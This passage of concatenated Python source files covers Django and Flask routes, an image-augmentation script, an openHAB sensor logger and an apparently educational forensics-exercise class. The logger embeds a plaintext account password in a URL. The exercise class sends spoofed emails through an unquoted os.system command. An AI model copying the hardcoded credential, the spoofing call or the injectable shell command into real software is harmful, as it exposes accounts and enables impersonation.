list(range(len(dataset)))\n random.shuffle(indices)\n dataset_shuff = [dataset[i] for i in indices] \n return dataset_shuff","repo_name":"htrenquier/argument-based-explainer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39200430674","text":"\"\"\"Bouncing DVD Logo, by Al Sweigart al@inventwithpython.com\nA bouncing DVD logo animation. You have to be \"of a certain age\" to\nappreciate this. 
Press Ctrl-C to stop.\n\nNOTE: Do not resize the terminal window while this program is running.\nView the original code at https://nostarch.com/big-book-small-python-projects\nTags: short, artistic, bext\"\"\"\n\nimport sys, random, time\n\ntry:\n import bext\nexcept ImportError:\n print(\"\"\"This program requires the bext module, which you\n can install by following the instructions at\n https://pypi.org/project/Bext/\"\"\")\n sys.exit()\n\n# Set up the constants:\nWIDTH, HEIGHT = bext.size()\n# We can't print to the last column on Windows without it adding a\n# newline automatically, so reduce the width by one:\nWIDTH -= 1\n\nNUMBER_OF_LOGOS = 5\nPAUSE_AMOUNT = 0.2\n\nCOLORS = ['red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white']\n\nUP_RIGHT = 'ur'\nUP_LEFT = 'ul'\nDOWN_RIGHT = 'dr'\nDOWN_LEFT = 'dl'\nDIRECTIONS = (UP_RIGHT, UP_LEFT, DOWN_RIGHT, DOWN_LEFT)\n\n# Key names for logo dictionaries:\nCOLOR = 'color'\nX = 'x'\nY = 'y'\nDIR = 'direction'\n\nLOGO_TEXT = 'FLANCREST ENTERPRISES' # Sets Logo text\nLOGO_LENGTH = len(LOGO_TEXT) # Sets Logo length\n\n\ndef main():\n bext.clear()\n\n # Generate some logos.\n logos = []\n for i in range(NUMBER_OF_LOGOS):\n logos.append({COLOR: random.choice(COLORS),\n X: random.randint(1, WIDTH - (LOGO_LENGTH + 1)),\n Y: random.randint(1, HEIGHT - (LOGO_LENGTH + 1)),\n DIR: random.choice(DIRECTIONS)})\n if logos[-1][X] % 2 == 1:\n # Make sure X is even so it can hit the corner.\n logos[-1][X] -= 1\n\n corner_bounces = 0 # Count how many times a logo hits a corner.\n while True: # Main program loop.\n for logo in logos: # Handle each logo in the logos list.\n # Erase the logo's current location:\n bext.goto(logo[X], logo[Y])\n print(LOGO_LENGTH * ' ', end='')\n\n original_direction = logo[DIR]\n\n # See if the logo bounces off the corners:\n if logo[X] == 0 and logo[Y] == 0:\n logo[DIR] = DOWN_RIGHT\n corner_bounces += 1\n elif logo[X] == 0 and logo[Y] >= HEIGHT - 1:\n logo[DIR] = UP_RIGHT\n corner_bounces += 1\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[Y] == 0:\n logo[DIR] = DOWN_LEFT\n corner_bounces += 1\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[Y] >= HEIGHT - 1:\n logo[DIR] = UP_LEFT\n corner_bounces += 1\n\n # See if the logo bounces off the left edge:\n elif logo[X] == 0 and logo[DIR] == UP_LEFT:\n logo[DIR] = UP_RIGHT\n elif logo[X] == 0 and logo[DIR] == DOWN_LEFT:\n logo[DIR] = DOWN_RIGHT\n\n # See if the logo bounces off the right edge:\n # (WIDTH - 3 because 'DVD' has 3 letters.)\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[DIR] == UP_RIGHT:\n logo[DIR] = UP_LEFT\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[DIR] == DOWN_RIGHT:\n logo[DIR] = DOWN_LEFT\n\n # See if the logo bounces off the top edge:\n elif logo[Y] == 0 and logo[DIR] == UP_LEFT:\n logo[DIR] = DOWN_LEFT\n elif logo[Y] == 0 and logo[DIR] == UP_RIGHT:\n logo[DIR] = DOWN_RIGHT\n\n # See if the logo bounces off the bottom edge:\n elif logo[Y] >= HEIGHT - 1 and logo[DIR] == DOWN_LEFT:\n logo[DIR] = UP_LEFT\n elif logo[Y] >= HEIGHT - 1 and logo[DIR] == DOWN_RIGHT:\n logo[DIR] = UP_RIGHT\n\n if logo[DIR] != original_direction:\n # Change color when the logo bounce:\n logo[COLOR] = random.choice(COLORS)\n\n # Move the logo. 
(X moves by 2 because the terminal\n # characters are twice as tall as they are wide.)\n if logo[DIR] == UP_RIGHT:\n logo[X] += 2\n logo[Y] -= 1\n elif logo[DIR] == UP_LEFT:\n logo[X] -= 2\n logo[Y] -= 1\n elif logo[DIR] == DOWN_RIGHT:\n logo[X] += 2\n logo[Y] += 1\n elif logo[DIR] == DOWN_LEFT:\n logo[X] -= 2\n logo[Y] += 1\n\n # Display number of corner bounces:\n bext.goto(5, 0)\n bext.fg('white')\n print('Corner bounces:', corner_bounces, end='')\n\n for logo in logos:\n # Draw the logos at their new location:\n bext.goto(logo[X], logo[Y])\n bext.fg(logo[COLOR])\n print(LOGO_TEXT, end='')\n\n bext.goto(0, 0)\n\n sys.stdout.flush() # Required for bext-using programs.\n time.sleep(PAUSE_AMOUNT)\n\n\n# If this program was run (instead of imported), run the animation:\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print()\n print('Bouncing DVD Logo, by Al Sweigart')\n sys.exit() # When Ctrl-C is pressed, end the program.\n","repo_name":"joshuagladwin/The-Big-Book-of-Small-Python-Projects","sub_path":"Projects/Project #05 Bouncing DVD Logo/bouncingdvd.py","file_name":"bouncingdvd.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"10575963051","text":"from django.urls import re_path\nfrom .views import products, collections, errors\n\nurlpatterns = [\n re_path(r'^products/?$', products.products),\n re_path(r'^product/(?P\\w+)/?$', products.product),\n re_path(r'^collections/?$', collections.all_collections),\n re_path(r'^collection/(?P\\w+)/products/?$', products.products_by_collect),\n re_path(r'.', errors.error404),\n]\n\n","repo_name":"mercutiy/django","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44611699236","text":"from flask import render_template, redirect, request, url_for, session, flash\nfrom sqlalchemy import select\nfrom flask_login import login_required, current_user\nfrom datetime import datetime\n\nfrom app.forms import forms\nfrom app import models\nfrom app.utils import authenticators\nimport app.utils.formatters as formatters\nimport app.utils.messengers as messengers\n\nfrom app import db\nfrom app.routes.event import bp\n\n# =======================================\n# Event\n# =======================================\n\n\n# View event\n@bp.route(\"/campaigns/-/event/-\", methods=[\"GET\", \"POST\"])\ndef view_event(campaign_name, campaign_id, event_name, event_id):\n\n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n \n campaign = event.parent_campaign\n\n # Format belligerents data\n belligerents = event.separate_belligerents() \n\n form = forms.CommentForm()\n delete_form = forms.SubmitForm()\n\n # Set scroll_to target for back button\n session[\"timeline_scroll_target\"] = f\"event-{event.id}\"\n\n # Check if new comment submitted\n if form.validate_on_submit():\n \n # Check user is a member of the campaign\n authenticators.check_membership(campaign)\n\n # Create new comment\n comment = models.Comment()\n comment.update(form=request.form,\n parent_event=event,\n author=current_user)\n\n # Create new comment notification\n messengers.send_comment_notification(sender=current_user,\n recipients=campaign.members,\n campaign=campaign,\n event=event)\n\n return redirect(url_for('event.view_event', \n campaign_name=campaign.url_title,\n 
campaign_id=campaign.id, \n event_name=event.url_title,\n event_id=event.id))\n\n return render_template(\"event_page.html\", \n event=event, \n campaign=campaign, \n belligerents=belligerents,\n form=form,\n delete_form=delete_form)\n\n\n# Add new event\n@bp.route(\"/campaigns/-/event/new-event\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_event(campaign_name, campaign_id):\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n\n authenticators.permission_required(campaign)\n\n # Check if date argument given\n if \"date\" in request.args:\n # Get date arguments\n datestring = request.args[\"date\"]\n args = request.args\n # Increase the date by one unit and format the datestring\n datestring = formatters.increment_datestring(datestring, args)\n # Create placeholder event\n event = models.Event()\n event.create_blank(datestring)\n # Prepopulate form\n form = forms.CreateEventForm(obj=event)\n\n # Otherwise, create default empty form\n else:\n form = forms.CreateEventForm()\n\n # Check if user has submitted a new event\n if form.validate_on_submit():\n # Create new event object using form data\n event = models.Event()\n event.update(form=form.data,\n parent_campaign=campaign,\n new=True)\n # Update \"following_event\" relationships for all events\n campaign.get_following_events()\n # Check all epochs for events\n campaign.check_epochs()\n # Create notification message\n messengers.send_event_notification(current_user,\n recipients=campaign.members,\n campaign=campaign,\n event=event)\n\n # Set scroll_to target for back button\n session[\"timeline_scroll_target\"] = f\"event-{event.id}\"\n\n return redirect(url_for(\"campaign.edit_timeline\",\n campaign_name=campaign.url_title,\n campaign_id=campaign.id))\n\n # Flash form errors\n for field_name, errors in form.errors.items():\n for error_message in errors:\n flash(field_name + \": \" + error_message)\n\n return render_template(\"new_event.html\", \n form=form, \n campaign=campaign)\n\n\n# Edit existing event\n@bp.route(\"/campaigns/-/event/-/edit\", methods=[\"GET\", \"POST\"])\n@login_required\ndef edit_event(campaign_name, campaign_id, event_name, event_id):\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n \n # Check if the user has permissions to edit the target campaign.\n authenticators.permission_required(campaign)\n\n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n\n if event:\n # Set scroll_to target for back button\n session[\"timeline_scroll_target\"] = f\"event-{event.id}\"\n\n form = forms.CreateEventForm(obj=event)\n delete_form = forms.SubmitForm()\n\n if form.validate_on_submit():\n # Update event object using form data\n event.update(form=form.data, \n parent_campaign=campaign)\n\n # Update \"following_event\" relationships for all events\n campaign.get_following_events()\n\n # Update all epochs\n campaign.check_epochs()\n\n return redirect(url_for(\"campaign.edit_timeline\", \n campaign_name=campaign.url_title,\n campaign_id=campaign.id))\n\n # Change form label to 'update'\n form.submit.label.text = 'Update Event'\n\n # Flash form errors\n for field_name, errors in form.errors.items():\n for error_message in errors:\n flash(field_name + \": \" + error_message)\n\n return render_template(\"new_event.html\",\n campaign=campaign,\n campaign_name=campaign.url_title,\n event_name=event.url_title,\n form=form,\n delete_form=delete_form,\n event=event,\n edit=True)\n\n\n# Delete 
existing event\n@bp.route(\"/campaigns/-/event/-/delete\", methods=[\"POST\"])\n@login_required\ndef delete_event(campaign_name, campaign_id, event_name, event_id):\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n \n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n\n # Check if the user has permissions to edit the target campaign.\n authenticators.permission_required(campaign)\n\n campaign.last_edited = datetime.now()\n\n db.session.delete(event)\n db.session.commit()\n\n # Update \"following_event\" relationships for all events\n campaign.get_following_events()\n\n # Update campaigns epochs\n campaign.check_epochs()\n\n return redirect(url_for(\"campaign.edit_timeline\",\n campaign_name=campaign.url_title,\n campaign_id=campaign.id))\n\n\n# Delete comment\n@bp.route(\"/campaigns/-/event/-/comment//delete\", methods=[\"POST\"])\n@login_required\ndef delete_comment(campaign_name, campaign_id, event_name, event_id, comment_id):\n \n target_comment_id = comment_id\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n \n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n \n comment = db.session.execute(\n select(models.Comment)\n .filter_by(id=target_comment_id)).scalar()\n\n # Check if it is the comment author who is deleting the comment\n if comment.author == current_user:\n authenticators.check_membership(campaign)\n else:\n # Check if the user has permissions to edit the target campaign.\n authenticators.permission_required(campaign)\n\n # Check if comment -> event -> campaign relationship is valid\n if comment in event.comments and event in campaign.events:\n # Delete the comment\n db.session.delete(comment)\n db.session.commit()\n\n return redirect(url_for('event.view_event', \n campaign_name=campaign.url_title,\n campaign_id=campaign.id, \n event_name=event.url_title,\n event_id=event.id))\n","repo_name":"Ozzletroll/WAR-COR","sub_path":"app/routes/event/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38590050845","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\nfrom pathlib import Path\n\nimport hydra\nimport kornia\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom dotenv import find_dotenv, load_dotenv\nfrom kornia.augmentation import ImageSequential\nfrom omegaconf import OmegaConf\nfrom PIL import Image\nfrom torchvision import transforms\n\n\n# from tests.test_data import test_traindata_length\ndef getImagesAndLabels(input_filepath: Path):\n \"\"\"\n Takes a path as input and returns all images(PNG and JPG) in path\n \"\"\"\n image_path = list(input_filepath.glob(\"**/*.png\")) + list(\n input_filepath.glob(\"**/*.jpg\")\n )\n # All path to images\n non_segmented_images = [img for img in image_path if \"GT\" not in str(img)]\n labels_non_segment = [img.parts[-2] for img in non_segmented_images]\n\n # All fish classes\n classes = list(set(labels_non_segment))\n print(f\"Available Classes: {classes}\")\n\n int_classes = {fish: i for i, fish in enumerate(classes)}\n lables = [int_classes[lable] for lable in labels_non_segment]\n\n # Label Dictionary\n print(int_classes)\n\n uniqlabels = list(set(lables))\n\n return non_segmented_images, lables, uniqlabels, int_classes\n\n\ndef get_params(cfg: OmegaConf):\n \"\"\"\n Returns all parameters in config 
file\n \"\"\"\n input_filepath = f\"{cfg.paths.input_filepath}\"\n output_filepath = f\"{cfg.paths.output_filepath}\"\n input_filepath = Path(input_filepath)\n\n return input_filepath, output_filepath\n\n\n@hydra.main(config_name=\"dataset_conf.yaml\", config_path=\"../../conf\")\ndef main(cfg: OmegaConf):\n \"\"\"Runs data processing scripts to turn raw data from (input_filepath : ../raw)\n into cleaned data ready to be analyzed (saved in ../processed).\n \"\"\"\n\n input_filepath, output_filepath = get_params(cfg)\n\n # Check if path exists else raise error\n if not os.path.exists(input_filepath):\n raise ValueError(\"Input path does not exist\")\n if not os.path.exists(output_filepath):\n raise ValueError(\"Output path does not exist\")\n\n non_segmented_images, labels, uniqLabels, int_classes = getImagesAndLabels(\n input_filepath\n )\n\n # Saving in a DataFrame\n image_data = pd.DataFrame({\"Path\": non_segmented_images, \"labels\": labels})\n\n convert_tensor = transforms.Compose(\n [transforms.Resize((64, 64)), transforms.ToTensor()]\n )\n\n aug_list = ImageSequential(\n # kornia.color.BgrToRgb(),\n kornia.augmentation.ColorJitter(0.2, 0.0, 0.0, 0.0, p=1.0),\n kornia.augmentation.RandomAffine(360, p=1.0),\n kornia.augmentation.RandomPerspective(0.1, p=0.8),\n kornia.augmentation.RandomHorizontalFlip(p=0.5),\n )\n\n for label in uniqLabels:\n class_name = list(int_classes.keys())[list(int_classes.values()).index(label)]\n print(class_name)\n dir_exist = os.path.exists(f\"{output_filepath}{class_name}\")\n if not dir_exist:\n os.mkdir(f\"{output_filepath}{class_name}\")\n counter = 0\n for im in image_data[image_data.labels == label].Path:\n print(im)\n img = Image.open(im)\n img_tensor = convert_tensor(img).unsqueeze(0).repeat(10, 1, 1, 1)\n out = aug_list(img_tensor)\n for i in range(10):\n image = out[i].numpy().transpose((1, 2, 0))\n plt.imsave(f\"{output_filepath}{class_name}\\im{counter}{i}.png\", image)\n counter += 1\n\n\nif __name__ == \"__main__\":\n log_fmt = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"koldbrandt/mlops_fuzzy-fish-waffle","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28581956871","text":"import requests\nimport sys\nimport pandas\nimport time\nfrom datetime import datetime\nimport openhab_data_access\n\nSleep_time = 30 # Frequency of data to be collected in seconds\nNo_of_Data_samples = 30 # No of data samples required with a frequency of Sleep_time\ndatabase = pandas.read_csv('~/Work/pycharm_projects/REST_API_database_2', low_memory=False)\n# Opening csv file using pandas\n\nprint(\"working\")\n\n# openhab cloud REST API URL syntax https://:@home.myopenhab.org/rest/items\ncloud_api_url = \"https://praeklima.tud%40gmail.com:praeklima_tud@2021@home.myopenhab.org/rest/items/\"\nlocalhost_url = \"http://192.168.3.1:8080/rest/items/\"\n# Column names for the database\n# column = ['date', 'time', 'localCurrentTemperature', 'localCurrentApparentTemperature', 'LocalForecastedTemperature_3',\n# 
'LocalForecastedApparentTemperature_3', 'LocalForecastedTemperature_6',\n# 'LocalForecastedApparentTemperature_6', 'localCurrentHumidity', 'LocalForecastedHumidity_3',\n# 'LocalForecastedHumidity_6', 'LocalCurrent_Cloudiness', 'LocalForecastedCloudiness_3',\n# 'LocalForecastedCloudiness_6', 'localCurrentUVIndex', 'LocalCurrent_Rain', 'LocalForecastedRain_3',\n# 'LocalForecastedRain_6',\n# 'LocalCurrent_Snow', 'LocalForecastedSnow_3', 'LocalForecastedSnow_6', 'SensorTemperature',\n# 'SensorRelativeHumidity', 'SensorUltraviolet', 'SensorLuminance', 'MotionAlarm', 'TamperAlarm',\n# 'WallPlugSwitch_Switch_1', 'WallPlugSwitch_SensorPower_1', 'Multisensor_outside_SensorTemperature',\n# 'Multisensor_outside_SensorRelativeHumidity', 'Multisensor_outside_SensorUltraviolet',\n# 'Multisensor_outside_SensorLuminance',\n# 'Multisensor_outside_TamperAlarm', 'Multisensor_outside_MotionAlarm', 'sensor1_temperature',\n# 'sensor2_temperature', 'sensor3_temperature', 'sensor4_temperature', 'sensor5_temperature',\n# 'sensor1_humidity', 'sensor2_humidity', 'sensor3_humidity', 'sensor4_humidity', 'sensor5_humidity']\n\ncolumn = ['date', 'time', 'localCurrentTemperature', 'localCurrentApparentTemperature', 'LocalForecastedTemperature_3',\n 'LocalForecastedApparentTemperature_3', 'LocalForecastedTemperature_6',\n 'LocalForecastedApparentTemperature_6', 'localCurrentHumidity', 'LocalForecastedHumidity_3',\n 'LocalForecastedHumidity_6', 'LocalCurrent_Cloudiness', 'LocalForecastedCloudiness_3',\n 'LocalForecastedCloudiness_6', 'localCurrentUVIndex', 'LocalCurrent_Rain', 'LocalForecastedRain_3',\n 'LocalForecastedRain_6',\n 'LocalCurrent_Snow', 'LocalForecastedSnow_3', 'LocalForecastedSnow_6', 'SensorTemperature',\n 'SensorRelativeHumidity', 'SensorUltraviolet', 'SensorLuminance', 'MotionAlarm', 'TamperAlarm',\n 'WallPlugSwitch1_Switch_1', 'WallPlugSwitch1_SensorPower_1','Multisensor_outside_SensorTemperature',\n 'Multisensor_outside_SensorRelativeHumidity', 'Multisensor_outside_SensorUltraviolet', 'Multisensor_outside_SensorLuminance',\n 'Multisensor_outside_TamperAlarm', 'Multisensor_outside_MotionAlarm']\n\nrow_data = []\ndata = []\ncount = 0\n\nopenhab_data_access.openhab_read_data(localhost_url, column[22])\n\nwhile True: # infinite loop\n now = datetime.now()\n row_data = [now.strftime(\"%Y-%m-%d\"), now.strftime(\"%H:%M:%S\")] # time stamp for data collection\n for i in range(2, len(column)):\n value = openhab_data_access.openhab_read_data(localhost_url, column[i])\n if 1 < i < 8 or i == 21 or i == 29: # Removing units from the data\n value = value[:len(value) - 4]\n elif 14 < i < 21:\n value = value[:len(value) - 3]\n elif 7 < i < 14:\n value = value[:len(value) - 2]\n row_data.append(value)\n count = count + 1\n data.append(row_data)\n print(row_data)\n time.sleep(Sleep_time)\n # print(count)\n sys.stdout.write(\"\\r\")\n print(count, end='', flush=True)\n if count == No_of_Data_samples:\n time.sleep(1)\n sys.stdout.write(\"\\r\")\n count = 0\n # print(data)\n df = pandas.DataFrame(data, columns=column) # Creating a Pandas database for current data\n # print(df)\n database = database.append(df, ignore_index=True) # appending new data to the main REST_API_database\n # print(database)\n database.to_csv('~/Work/pycharm_projects/REST_API_database_2', index=False) # Converting it into csv file\n data = 
[]\n\n","repo_name":"Jaswanth1729/Praeklima_fassade","sub_path":"Software_files/Rest_API_database.py","file_name":"Rest_API_database.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41881621015","text":"#!/usr/bin/env python3\n######\n# @author: Ana Nieto,\n# @email: nieto@lcc.uma.es\n# @institution: University of Malaga\n# @country: Spain\n# @website: https://www.linkedin.com/in/ana-nieto-72b17718/\n######\n\nimport genera as gd\nimport forense as fo\nimport random\nimport warnings\nimport re\nimport os\nimport sys\nfrom argparse import ArgumentParser\nimport json\nfrom stegano import lsb\n\n\n#-----------------------------------\n# CLASSES\n#-----------------------------------\nclass SERA():\n \"\"\"\n THIS CLASS REPRESENTS THE CONTEXT OF THE SERA SYSTEM\n \"\"\"\n PICTURE = ['cebra.png', 'pinguino.png', 'leon.png', 'hipo.png', 'girafa.png', 'william.png']\n FILETYPE = ['.docx', '.xlsx', '.gif', '.jpg', '.tiff', '.png']\n\n ACT_VAL = ['title', 'code', 'description', 'evaluation']\n STU_VAL = ['name', 'email']\n SYS_VAL = ['path_results', 'path_images', 'path_code', 'path_submissions']\n\n # ---------------------------------\n # CONSTRUCTOR\n # ---------------------------------\n def __init__(self, infoactivity, infostudent, infosystem, fileInput=None):\n\n if fileInput is not None:\n data = self.readContextFrom(fileInput)\n infosystem = data.get('system')\n infoactivity = data.get('activity')\n infostudent = data.get('student')\n\n self.infoactivity = infoactivity\n self.infostudent = infostudent\n self.infosystem = infosystem\n\n\n if not self.checkMinValues():\n str_warning = 'init>> SERA created with incomplete information.\\nActivity:%s\\nStudent:%s\\nSystem:%s' %\\\n (self.infoactivity, self.infostudent, self.infosystem)\n warnings.warn(str_warning)\n\n self.deffilename = '%s_%s' % (self.getStudentName().replace(' ', ''), self.getCode())\n\n\n def checkMinValues(self):\n rx = re.compile('|'.join(list(self.infoactivity.keys()) + list(self.infostudent.keys()) +\n list(self.infosystem.keys())))\n\n min_keys = SERA.ACT_VAL + SERA.STU_VAL + SERA.SYS_VAL\n\n for i in min_keys:\n if not rx.match(i): return False\n\n return True\n\n # ---------------------------------\n # STATIC METHODS\n # ---------------------------------\n @staticmethod\n def getFileType():\n return SERA.FILETYPE\n\n @staticmethod\n def getFileTypeNumber(num):\n if 0<= num <= len(SERA.FILETYPE):\n return SERA.FILETYPE[num]\n else:\n raise ValueError('SERA class>> Unexpected number for FILETYPE array')\n\n # ---------------------------------\n # METHODS TO GET THE VALUES\n # ---------------------------------\n def getFileName(self):\n return self.deffilename\n\n def getCompletePathFileName(self):\n return self.getPathResults() + self.getFileName()\n\n def getTitle(self):\n return self.infoactivity.get('title')\n\n def getDescription(self):\n return self.infoactivity.get('description')\n\n def getCode(self):\n return self.infoactivity.get('code')\n\n def getEvaluation(self):\n return self.infoactivity.get('evaluation')\n\n def getStudentName(self):\n return self.infostudent.get('name')\n\n def getStudentEmail(self):\n return self.infostudent.get('email')\n\n def getPathResults(self):\n return self.infosystem.get('path_results')\n\n def getPathImages(self):\n return self.infosystem.get('path_images')\n\n def getPathSubmissions(self):\n return self.infosystem.get('path_submission')\n\n def getPathCode(self):\n return 
self.infosystem.get('path_code')\n\n def getSurpisePicturePath(self):\n return self.getPathImages() + '/' + random.choice(SERA.PICTURE)\n\n def isPicture(self, ext):\n rx = re.compile('|'.join(['.gif', '.jpg', '.tiff', '.png']))\n\n return rx.match(ext)\n\n def getFile(self, fileExt=None):\n \"\"\"\n Returns a file generated based on the information available.\n :param fileExt: if None (default) the type of file is random.\n :return: the path (string) to the new file.\n \"\"\"\n if fileExt is None:\n fileExt = random.choice(SERA.FILETYPE)\n\n if self.isPicture(fileExt):\n gd.giveMePicture(self.getTitle(), self.getStudentName(), self.getCompletePathFileName(), fileExt,\n evaluation=self.getEvaluation())\n\n elif fileExt=='.docx':\n gd.giveMeADocx(self.getTitle(), self.getStudentName(), self.getDescription(),\n self.getCompletePathFileName() + '.docx', evaluation=self.getEvaluation(),\n picture=self.getSurpisePicturePath())\n elif fileExt=='.xlsx':\n gd.giveMeAXlsx(self.getTitle(), self.getStudentName(), self.getDescription(),\n self.getCompletePathFileName() + '.xlsx', evaluation=self.getEvaluation(),\n picture=self.getSurpisePicturePath())\n else:\n return None\n\n return self.getCompletePathFileName() + fileExt\n\n def getHelloStudent(self, extension):\n if extension=='.py':\n return gd.giveMeHelloFile(self.getStudentName(), self.getFileName(), '.py', path=self.getPathCode())\n elif extension=='.cpp':\n return gd.giveMeHelloFile(self.getStudentName(), self.getFileName(), '.cpp', '.exe', path=self.getPathCode())\n else:\n return False\n\n def getStegoPath(self):\n return self.getPathImages() + self.getFileName() + '_stego.png'\n\n def getStegoImage(self, text=None):\n image = self.getSurpisePicturePath()\n if text is None:\n #Random!\n basetext = \"Un %s me dijo que sin %s no hay %s, pues depende de para qué. Esto es aleatorio. 
\" \\\n \"Indica en el formulario esta palabra: %s\"\n r1 = random.choice(['periquito', 'babyshark', 'buho', 'chorlito', 'alumno', 'listo', 'iluminado',\n 'apostol', 'tartamudo', 'algo'])\n r2 = random.choice(['timidez', 'aventura', 'fuerza', 'sacrificio'])\n r3 = random.choice(['recompensa', 'exito', 'fracaso', 'caida', 'altura'])\n r4 = random.choice(['ALEGRIA', 'TRISTEZA', 'VENGANZA', 'LOCURA', 'PASION'])\n text = basetext % (r1, r2, r3, r4)\n\n secret = lsb.hide(image, text)\n pathstego = self.getStegoPath()\n secret.save(pathstego)\n\n return pathstego\n\n def getStegoMessage(self):\n \"\"\"\n :return: secret message saved in the picture.\n \"\"\"\n clear_message = lsb.reveal(self.getStegoPath())\n\n return clear_message\n\n def getDict(self):\n \"\"\"\n :return: this object expressed as dictionary.\n \"\"\"\n return {\"activity\":self.infoactivity, \"student\":self.infostudent, \"system\":self.infosystem}\n\n\n def sendEmail(self, username, password, sender, sender_name, subject, file=None, smtp_server=\"mail.smtp2go.com\", port=\"587\"):\n \"\"\"\n Sends SERA email to this user.\n :param username: username used to send emails using the smtp server (if required).\n :param password: password to be used for the username (if required).\n :param sender: emisor of this email.\n :param sender_name: name of the sender.\n :param subject: subject of the email.\n :param file: htlm file to be sent in the body.\n :return: true if the email was sent.\n \"\"\"\n\n recipients = self.getStudentEmail()\n\n if file is None:\n file = gd.generaHTLM_email(self.getPathImages() + \"fakehtmlemail.html\",\n self.getPathResults() + self.getFileName() + \".html\",\n \"Student\", self.getStudentName())\n\n if smtp_server==\"mail.smtp2go.com\":\n spoofstring = \"--host %s --port %s --username %s --password %s --sender %s --name \\\"%s\\\" --recipients %s \" \\\n \"--subject \\\"%s\\\" --filename %s\" % (\n smtp_server, port, username, password, sender, sender_name, recipients, subject, file)\n cmd = \"test/email-spoofer-py/spoof.py %s\" % spoofstring\n os.system(cmd)\n return True\n\n return False\n\n # ---------------------------------\n # MODIFICATION METHODS\n # ---------------------------------\n def setFileName(self, filename):\n self.deffilename = filename\n\n def save(self, fileName=None):\n \"\"\"\n Save this context into a file (json)\n :param fileName: name of the file to save this context. 
If None then fileName == self.getFileName()\n :return: path of the new file (if any)\n \"\"\"\n if fileName is None:\n fileName = self.getFileName()\n\n values = self.getDict()\n\n # write values:\n with open('%s%s.json' % (self.getPathResults(),fileName), 'w') as outfile:\n json.dump(values, outfile)\n\n return self.getPathResults() + fileName\n\n def readContextFrom(self, filePathName=None):\n \"\"\"\n Read JSON context from a file\n :param filePathName: path and name for the file\n :return: dict representing the context\n \"\"\"\n if filePathName is None:\n filePathName = self.getCompletePathFileName() + '.json'\n\n with open(filePathName) as json_file:\n data = json.load(json_file)\n\n return data\n\n\n\n\n # ---------------------------------\n # REDEFINED METHODS\n # ---------------------------------\n def __str__(self):\n str = 'Title:%s\\n' \\\n 'Code:%s\\n' \\\n 'Description:%s\\n' \\\n 'Evaluation:%s\\n'\\\n 'Student:%s, %s' % \\\n (self.getTitle(), self.getCode(), self.getDescription(), self.getEvaluation(), self.getStudentName(),\n self.getStudentEmail())\n return str\n\n#-----------------------------------\n# AUXILIAR METHODS\n#-----------------------------------\ndef changeFileExtension(file):\n \"\"\"\n Change the extension of a file\n :param file: file to work with.\n :return: New complete name of the file.\n \"\"\"\n new_extension = random.choice(SERA.FILETYPE)\n pre, ext = os.path.splitext(file)\n newname = pre + new_extension\n os.rename(file, newname)\n\n return newname\n\n\ndef checkhash():\n a2 = input('Select file:')\n if not os.path.isfile(a2):\n print('File not found')\n return False\n a3 = True\n while a3:\n print(\"\"\"\n Choose algorithm:\n [1] md5\n [2] sha256\n [3] sha1\n [*] Back to menu (different value)\n \"\"\")\n a3 = input(\"Your answer is: \")\n a3 = int(a3)\n if 1 <= a3 <= 3:\n values = ['md5', 'sha256', 'sha1']\n alg = values[a3-1]\n a4 = input('Provide hash value:')\n if (fo.checkhash(a2, a4, alg)):\n print('Well done!!')\n a3 = False\n else:\n print('Different values, please try again')\n\ndef checksignature():\n a2 = input('Select file:')\n if not os.path.isfile(a2):\n print('File not found')\n return False\n a3 = True\n while a3: # same order as SERA.FILETYPE\n print(\"\"\"\n Choose type of file:\n [1] Microsoft Word (.docx) \n [2] Microsoft Excel (.xlsx)\n [3] Gif (.gif)\n [4] JPEG (.jpg)\n [5] TIFF (.tiff)\n [6] PNG (.png)\n [*] Back to menu (different value)\n \"\"\")\n a3 = input(\"Your answer is: \")\n a3 = int(a3)\n if 1 <= a3 <= 6:\n chosen = SERA.getFileTypeNumber(a3-1)\n if a3 == 4: chosen ='JPEG'\n if (fo.checksignature(a2, chosen)):\n print('Well done!!')\n a3 = False\n else:\n print('Different values, please try again')\n else:\n a3=False\n\ndef checkmetadata(option, sample):\n if not 